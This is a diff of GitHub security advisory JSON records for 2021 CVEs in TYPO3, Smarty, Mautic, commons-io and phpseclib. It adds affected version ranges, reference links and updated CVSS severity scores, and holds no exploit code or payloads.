a/advisories/github-reviewed/2021/02/GHSA-3rpf-5rqv-689q/GHSA-3rpf-5rqv-689q.json b/advisories/github-reviewed/2021/02/GHSA-3rpf-5rqv-689q/GHSA-3rpf-5rqv-689q.json index 604b355507a83..3cdbdf919c459 100644 --- a/advisories/github-reviewed/2021/02/GHSA-3rpf-5rqv-689q/GHSA-3rpf-5rqv-689q.json +++ b/advisories/github-reviewed/2021/02/GHSA-3rpf-5rqv-689q/GHSA-3rpf-5rqv-689q.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/165f1bd4d2eec328cfeaca517a725b46001de838" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2021-26120.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty" diff --git a/advisories/github-reviewed/2021/03/GHSA-2r6j-862c-m2v2/GHSA-2r6j-862c-m2v2.json b/advisories/github-reviewed/2021/03/GHSA-2r6j-862c-m2v2/GHSA-2r6j-862c-m2v2.json index 090e978f024ae..f4f23d130f4b1 100644 --- a/advisories/github-reviewed/2021/03/GHSA-2r6j-862c-m2v2/GHSA-2r6j-862c-m2v2.json +++ b/advisories/github-reviewed/2021/03/GHSA-2r6j-862c-m2v2/GHSA-2r6j-862c-m2v2.json @@ -102,6 +102,120 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -113,6 +227,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21355" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21355.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21355.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-form" diff --git a/advisories/github-reviewed/2021/03/GHSA-3vg7-jw9m-pc3f/GHSA-3vg7-jw9m-pc3f.json b/advisories/github-reviewed/2021/03/GHSA-3vg7-jw9m-pc3f/GHSA-3vg7-jw9m-pc3f.json index e79d8d1f48142..9b04670c0c743 100644 --- a/advisories/github-reviewed/2021/03/GHSA-3vg7-jw9m-pc3f/GHSA-3vg7-jw9m-pc3f.json +++ b/advisories/github-reviewed/2021/03/GHSA-3vg7-jw9m-pc3f/GHSA-3vg7-jw9m-pc3f.json @@ -102,6 +102,120 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -113,6 +227,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21357" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21357.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21357.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-form" diff --git a/advisories/github-reviewed/2021/03/GHSA-4jhw-2p6j-5wmp/GHSA-4jhw-2p6j-5wmp.json b/advisories/github-reviewed/2021/03/GHSA-4jhw-2p6j-5wmp/GHSA-4jhw-2p6j-5wmp.json index f38d72b34b865..6bfe86ec8870a 100644 --- a/advisories/github-reviewed/2021/03/GHSA-4jhw-2p6j-5wmp/GHSA-4jhw-2p6j-5wmp.json +++ b/advisories/github-reviewed/2021/03/GHSA-4jhw-2p6j-5wmp/GHSA-4jhw-2p6j-5wmp.json @@ -81,6 +81,44 @@ "last_known_affected_version_range": "<= 8.7.39" } }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -98,15 +136,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.24" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -120,15 +155,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.13" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -142,10 +174,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 11.1.0" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -157,6 +205,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21338" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21338.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21338.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-core" diff --git a/advisories/github-reviewed/2021/03/GHSA-4p9g-qgx9-397p/GHSA-4p9g-qgx9-397p.json b/advisories/github-reviewed/2021/03/GHSA-4p9g-qgx9-397p/GHSA-4p9g-qgx9-397p.json index de170548e16d8..2e5cfa78590d0 100644 --- a/advisories/github-reviewed/2021/03/GHSA-4p9g-qgx9-397p/GHSA-4p9g-qgx9-397p.json +++ b/advisories/github-reviewed/2021/03/GHSA-4p9g-qgx9-397p/GHSA-4p9g-qgx9-397p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4p9g-qgx9-397p", - "modified": "2021-03-29T17:43:44Z", + "modified": "2024-02-07T18:50:34Z", "published": "2021-03-23T01:54:09Z", "aliases": [ "CVE-2021-21359" @@ -15,6 +15,44 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -32,15 +70,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.24" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -54,15 +89,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.13" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -76,10 +108,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 11.1.0" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -91,6 +139,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21359" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21359.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21359.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-core" diff --git a/advisories/github-reviewed/2021/03/GHSA-fjh3-g8gq-9q92/GHSA-fjh3-g8gq-9q92.json b/advisories/github-reviewed/2021/03/GHSA-fjh3-g8gq-9q92/GHSA-fjh3-g8gq-9q92.json index 89afc21192167..e14cdca9db5df 100644 --- a/advisories/github-reviewed/2021/03/GHSA-fjh3-g8gq-9q92/GHSA-fjh3-g8gq-9q92.json +++ b/advisories/github-reviewed/2021/03/GHSA-fjh3-g8gq-9q92/GHSA-fjh3-g8gq-9q92.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fjh3-g8gq-9q92", - "modified": "2021-03-23T01:41:27Z", + "modified": "2024-02-02T16:44:46Z", "published": "2021-03-23T01:53:47Z", "aliases": [ "CVE-2021-21340" ], "summary": "Cross-Site Scripting in Content Preview", - "details": "> ### Meta\n> * CVSS: `AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (5.0)\n> * CWE-79\n> * Status: **DRAFT**\n\n### Problem\nIt has been discovered that database fields used as _descriptionColumn_ are vulnerable to cross-site scripting when their content gets previewed in the page module. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to Richie Lee who reported this issue and to TYPO3 framework merger Andreas Fernandez who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-007](https://typo3.org/security/advisory/typo3-core-sa-2021-007)", + "details": "### Problem\nIt has been discovered that database fields used as _descriptionColumn_ are vulnerable to cross-site scripting when their content gets previewed in the page module. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to Richie Lee who reported this issue and to TYPO3 framework merger Andreas Fernandez who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-007](https://typo3.org/security/advisory/typo3-core-sa-2021-007)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { @@ -55,6 +58,82 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] } ], "references": [ @@ -66,6 +145,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21340" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21340.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21340.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-backend" @@ -79,7 +166,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "LOW", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2021-03-23T01:41:27Z", "nvd_published_at": "2021-03-23T02:15:00Z" diff --git a/advisories/github-reviewed/2021/03/GHSA-qx3w-4864-94ch/GHSA-qx3w-4864-94ch.json b/advisories/github-reviewed/2021/03/GHSA-qx3w-4864-94ch/GHSA-qx3w-4864-94ch.json index bcf2743a32472..e9a9ce497c5f4 100644 --- a/advisories/github-reviewed/2021/03/GHSA-qx3w-4864-94ch/GHSA-qx3w-4864-94ch.json +++ b/advisories/github-reviewed/2021/03/GHSA-qx3w-4864-94ch/GHSA-qx3w-4864-94ch.json @@ -81,6 +81,44 @@ "last_known_affected_version_range": "<= 8.7.39" } }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -98,15 +136,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.24" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -120,15 +155,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.13" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -142,10 +174,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 11.1.0" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -157,6 +205,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21339" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21339.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21339.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-core" diff --git a/advisories/github-reviewed/2021/03/GHSA-w5hr-jm4j-9jvq/GHSA-w5hr-jm4j-9jvq.json b/advisories/github-reviewed/2021/03/GHSA-w5hr-jm4j-9jvq/GHSA-w5hr-jm4j-9jvq.json index 4cb6a335c0209..cc122c6727d97 100644 --- a/advisories/github-reviewed/2021/03/GHSA-w5hr-jm4j-9jvq/GHSA-w5hr-jm4j-9jvq.json +++ b/advisories/github-reviewed/2021/03/GHSA-w5hr-jm4j-9jvq/GHSA-w5hr-jm4j-9jvq.json @@ -44,6 +44,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26119" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2021-26119.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty/" diff --git a/advisories/github-reviewed/2021/03/GHSA-x79j-wgqv-g8h2/GHSA-x79j-wgqv-g8h2.json b/advisories/github-reviewed/2021/03/GHSA-x79j-wgqv-g8h2/GHSA-x79j-wgqv-g8h2.json index b34a003ec36cb..d3badb39e64af 100644 --- a/advisories/github-reviewed/2021/03/GHSA-x79j-wgqv-g8h2/GHSA-x79j-wgqv-g8h2.json +++ b/advisories/github-reviewed/2021/03/GHSA-x79j-wgqv-g8h2/GHSA-x79j-wgqv-g8h2.json @@ -58,6 +58,82 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] } ], "references": [ @@ -69,6 +145,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21358" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21358.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21358.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-form" diff --git a/advisories/github-reviewed/2021/03/GHSA-x7hc-x7fm-f7qh/GHSA-x7hc-x7fm-f7qh.json b/advisories/github-reviewed/2021/03/GHSA-x7hc-x7fm-f7qh/GHSA-x7hc-x7fm-f7qh.json index 6d78d15294e33..70aec0587772f 100644 --- a/advisories/github-reviewed/2021/03/GHSA-x7hc-x7fm-f7qh/GHSA-x7hc-x7fm-f7qh.json +++ b/advisories/github-reviewed/2021/03/GHSA-x7hc-x7fm-f7qh/GHSA-x7hc-x7fm-f7qh.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x7hc-x7fm-f7qh", - "modified": "2021-03-23T01:42:20Z", + "modified": "2024-02-02T16:44:14Z", "published": "2021-03-23T01:54:17Z", "aliases": [ "CVE-2021-21370" ], "summary": "Cross-Site Scripting in Content Preview (CType menu)", - "details": "> ### Meta\n> * CVSS: `AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.1)\n> * CWE-79\n> * Status: **DRAFT**\n\n### Problem\nIt has been discovered that content elements of type _menu_ are vulnerable to cross-site scripting when their referenced items get previewed in the page module. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 7.6.51, 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to TYPO3 contributor Oliver Bartsch who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-008](https://typo3.org/security/advisory/typo3-core-sa-2021-008)", + "details": "### Problem\nIt has been discovered that content elements of type _menu_ are vulnerable to cross-site scripting when their referenced items get previewed in the page module. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 7.6.51, 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to TYPO3 contributor Oliver Bartsch who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-008](https://typo3.org/security/advisory/typo3-core-sa-2021-008)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { @@ -121,6 +124,120 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -132,6 +249,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21370" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21370.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21370.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-backend" @@ -145,7 +270,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "LOW", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2021-03-23T01:42:20Z", "nvd_published_at": "2021-03-23T02:15:00Z" diff --git a/advisories/github-reviewed/2021/04/GHSA-4hjq-422q-4vpx/GHSA-4hjq-422q-4vpx.json b/advisories/github-reviewed/2021/04/GHSA-4hjq-422q-4vpx/GHSA-4hjq-422q-4vpx.json index 2a2c1360b7ffa..c93a90b3deb84 100644 --- a/advisories/github-reviewed/2021/04/GHSA-4hjq-422q-4vpx/GHSA-4hjq-422q-4vpx.json +++ b/advisories/github-reviewed/2021/04/GHSA-4hjq-422q-4vpx/GHSA-4hjq-422q-4vpx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4hjq-422q-4vpx", - "modified": "2022-08-10T23:35:31Z", + "modified": "2024-02-05T11:00:10Z", "published": "2021-04-06T17:20:58Z", "aliases": [ "CVE-2021-27908" @@ -44,6 +44,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27908" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27908.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/mautic/mautic" diff --git a/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json b/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json index adc9b8795d14b..d2faf0fb5c7d2 100644 --- a/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json +++ b/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gwrp-pvrq-jmwv", - "modified": "2022-02-08T21:31:42Z", + "modified": "2024-02-09T03:22:15Z", "published": "2021-04-26T16:04:00Z", "aliases": [ "CVE-2021-29425" @@ -11,7 +11,7 @@ "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" } ], "affected": [ @@ -33,6 +33,177 @@ ] } ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.cosium.vet:vet" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0" + }, + { + "last_affected": "3.22" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.diamondq.common:common-thirdparty.jcasbin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "last_affected": "1.4.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay:com.liferay.sass.compiler.jsass" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.1" + }, + { + "last_affected": "1.0.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.virjar:ratel-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "last_affected": "1.3.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "net.hasor:cobble-lang" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.1" + }, + { + "last_affected": "4.6.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.commons:commons-io" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.3.2" + }, + { + "last_affected": "1.3.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.commons-io" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4_3" + }, + { + "last_affected": "1.4_3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.checkerframework.annotatedlib:commons-io" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.6" + }, + { + "fixed": "2.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.smartboot.servlet:servlet-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.1.9" + }, + { + "last_affected": "0.6" + } + ] + } + ] } ], "references": [ @@ -227,6 +398,14 @@ { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" + }, + { + "type": "EVIDENCE", + "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2021-29425" + }, + { + "type": "WEB", + "url": "https://arxiv.org/pdf/2306.05534.pdf" } ], "database_specific": { @@ -239,4 +418,4 @@ "github_reviewed_at": "2021-04-26T15:21:31Z", "nvd_published_at": "2021-04-13T07:15:00Z" } -} \ No newline at end of file +} diff --git a/advisories/github-reviewed/2021/04/GHSA-vf4w-fg7r-5v94/GHSA-vf4w-fg7r-5v94.json b/advisories/github-reviewed/2021/04/GHSA-vf4w-fg7r-5v94/GHSA-vf4w-fg7r-5v94.json index 11db4bb7c4b85..0a2ee58ea1e0a 100644 --- a/advisories/github-reviewed/2021/04/GHSA-vf4w-fg7r-5v94/GHSA-vf4w-fg7r-5v94.json +++ b/advisories/github-reviewed/2021/04/GHSA-vf4w-fg7r-5v94/GHSA-vf4w-fg7r-5v94.json @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://github.com/phpseclib/phpseclib/pull/1635" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpseclib/phpseclib/CVE-2021-30130.yaml" + }, { "type": "WEB", "url": 